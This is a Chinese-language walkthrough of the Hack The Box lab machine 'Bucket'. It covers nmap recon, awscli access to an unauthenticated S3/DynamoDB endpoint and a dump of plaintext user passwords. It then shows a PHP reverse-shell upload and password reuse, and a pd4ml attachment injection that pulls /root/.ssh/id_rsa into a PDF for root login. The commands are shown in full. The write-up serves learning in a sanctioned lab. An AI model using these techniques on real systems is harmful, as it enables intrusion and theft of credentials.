Recon

Nmap的结果显示一共开放了两个端口，全端口扫描结果相同。同时Nmap也提醒我们80端口跳转到bucket.htb。所以我们将这个域名添加到hosts内。

~/Documents/HTB/Bucket
❯ cat nmap/initial 
# Nmap 7.91 scan initiated Fri Nov 13 18:38:05 2020 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.212
Nmap scan report for 10.10.10.212
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 13 18:38:37 2020 -- 1 IP address (1 host up) scanned in 31.88 seconds

Foothold

在web页面上发现一个新的域名s3.bucket.htb，用来存贮图片。结合三级域名和这个box的名字。这台机器多半和aws的对象存储有关。

<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/bug.jpg" alt="Bug" height="160" width="160">
</div>
<div class="description">
<h3>Bug Bounty and 0day Research</h3>
<span>march 17, 2020 | Security</span>
<p>Customised bug bounty and new 0day feeds. Feeds can be used on TV, mobile, desktop and web applications. Collecting security feeds from 100+ different trusted sources around the world.</p>
</div>
</article>
<div class="articles">

<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/malware.png" alt="Malware" height="160" width="160">
</div>
<div class="description">
<h3>Ransomware Alerts</h3>
<span>march 17, 2020 | Malware</span>
<p>Run awareness ad campaigns on Ransomwares and other newly found malwares. Choose different types of malwares to fit for your campaign</p>
</div>
</article>

<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/cloud.png" alt="cheer" height="160" width="160">
</div>
<div class="description">
<h3>Cloud Updates</h3>
<span>march 17, 2020 | Cloud</span>
<p>Stay tuned to cloud technology updates. A superior alternative to Push Notifications and SMS A2P alerts. </p>
</div>
</article>

将域名添加进hosts文件后访问。返回{"status": "running"}。使用 gobuster爆破目录，存在shell和health两个目录。

~/Documents/HTB/Bucket
❯ cat gobuster/s3.bucket.htb-root 
/shell (Status: 200)
/health (Status: 200)
/server-status (Status: 403)

到此，卡住。

User.txt

卡住以后经过论坛大佬的指点，aws官方开发了一个command line interface，叫awscli。这个机器的bucket类似未授权。

在查阅了一大堆官方文档以后，总算是有了点门路。

LowPrivShell

awscli安装需要安装
sudo apt -y awscli
安装完成以后需要运行 aws configure 来进行初次配置，由于这里是虚拟环境下的机器，里面的内容就随便写就行。

配置完成后，结合刚刚学到的命令，查看到这个对象存储实例里放着一个bucket，adserver。

~/Documents/HTB/Bucket
❯ aws s3 ls --endpoint-url http://s3.bucket.htb              
2020-11-14 11:20:04 adserver

~/Documents/HTB/Bucket
❯ aws s3api list-buckets --endpoint-url http://s3.bucket.htb                  
{
    "Buckets": [
        {
            "Name": "adserver",
            "CreationDate": "2020-11-14T03:10:03.738061Z"
        }
    ],
    "Owner": {
        "DisplayName": "webfile",
        "ID": "bcaf1ffd86f41161ca5fb16fd081034f"
    }
}

在扫出的health目录下，发现该网站还提供完全托管的数据库dynamodb，用以下的命令可以看到数据库里有一个表 users，以及表下的内容。

发现后一大堆密码，记录下来。

~/Documents/HTB/Bucket
❯ aws dynamodb list-tables --endpoint-url http://s3.bucket.htb 
{
    "TableNames": [
        "users"
    ]
}

~/Documents/HTB/Bucket
❯ aws dynamodb scan --endpoint-url http://s3.bucket.htb --table-name users
{
    "Items": [
        {
            "password": {
                "S": "Management@#1@#"
            },
            "username": {
                "S": "Mgmt"
            }
        },
        {
            "password": {
                "S": "Welcome123!"
            },
            "username": {
                "S": "Cloudadm"
            }
        },
        {
            "password": {
                "S": "n2vM-<_K_Q:.Aa2"
            },
            "username": {
                "S": "Sysadm"
            }
        }
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": null
}

使用一awscli里s3的命令可以将文件上传到指定的bucket下，而adserver就是存在web文件的bucket，而且还装了php，所以将php reverse shell上传上去，获得shell。

~/Documents/HTB/Bucket
❯ aws s3 cp ./revshell.php s3://adserver --endpoint-url=http://s3.bucket.htb
upload: ./revshell.php to s3://adserver/revshell.php          

~/Documents/HTB/Bucket
❯ aws s3 ls --endpoint-url http://s3.bucket.htb s3://adserver  
                           PRE images/
2020-11-14 11:40:05       5344 index.html
2020-11-14 11:40:22       3459 revshell.php

上传后访问s3.bucket.htb/adserver/revshell.php会触发下载，不知道为何在访问http://bucket.htb/revshell.php就能获得shell了。

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.212.
Ncat: Connection from 10.10.10.212:59844.
Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 03:45:11 up  2:06,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bucket:/$

UserShell

这里就很简单了，这台机器下就一个用户roy，使用之前拿到的密码，尝试了一遍，n2vM-<_K_Q:.Aa2这个密码切换用户成功，获得user.txt

www-data@bucket:/$ su - roy
su - roy
Password: n2vM-<_K_Q:.Aa2

roy@bucket:~$ wc -c user.txt
wc -c user.txt
33 user.txt
roy@bucket:~$

Privilege Escalation

查看端口时，发现本地监听了8000端口，查看apache的配置文件，发现8000托管在/var/www/bucket-app下

roy@bucket:/etc/apache2/sites-available$ cat 000-default.conf 
<VirtualHost 127.0.0.1:8000>
        <IfModule mpm_itk_module>
                AssignUserId root root
        </IfModule>
        DocumentRoot /var/www/bucket-app
</VirtualHost>

<VirtualHost *:80>
        DocumentRoot /var/www/html
        RewriteEngine On
        RewriteCond %{HTTP_HOST} !^bucket.htb$
        RewriteRule /.* http://bucket.htb/ [R]
</VirtualHost>
<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com
        ProxyPreserveHost on
        ProxyPass / http://localhost:4566/
        ProxyPassReverse / http://localhost:4566/
        <Proxy *>
                 Order deny,allow
                 Allow from all
         </Proxy>
        ServerAdmin webmaster@localhost
        ServerName s3.bucket.htb
        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

经过一段搜寻，在/var/www/bucket-app/index.php里发现了如下的代码，代码中出现了我们的老朋友file_put_contents和passthru。然而passthru中的变量我们并不可控，但是file_put_contents中的可以。pd4ml_demo.jar 是一个用于生成pdf的小工具。

if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}

这段代码的意思大概如下：

当我们发送POST请求，而且POST的内容为action = get_alerts时，会创建一个的新的DynamoDbClient连接。
连接完成以后会使用getIterator 按照规则读取指定table也就是alerts里的内容
将内容作为参数，写进result.pdf里

看明白后，我们提全路径大致如下:

创建alerts数据库
往里面插入我们要读取的内容
POST请求，触发
下载PDF

最后在结合pd4ml官方文档在pdf中插入附件。

# 创建表
aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url=http://s3.bucket.htb
# 将ssh-key作为附件放入pdf
aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' --endpoint-url=http://s3.bucket.htb
# 触发
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

执行完成后我们看到PRF里的ssh-key。

最后使用sshkey登录root。

~/Documents/HTB/Bucket
❯ ssh -i id_rsa root@10.10.10.212
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 14 Nov 2020 09:15:44 AM UTC

  System load:                      0.0
  Usage of /:                       39.9% of 19.56GB
  Memory usage:                     27%
  Swap usage:                       0%
  Processes:                        198
  Users logged in:                  1
  IPv4 address for br-bee97070fb20: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.212
  IPv6 address for ens160:          dead:beef::250:56ff:feb9:24c3


91 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Oct 13 10:25:01 2020
root@bucket:~# wc -c root.txt 
33 root.txt
root@bucket:~#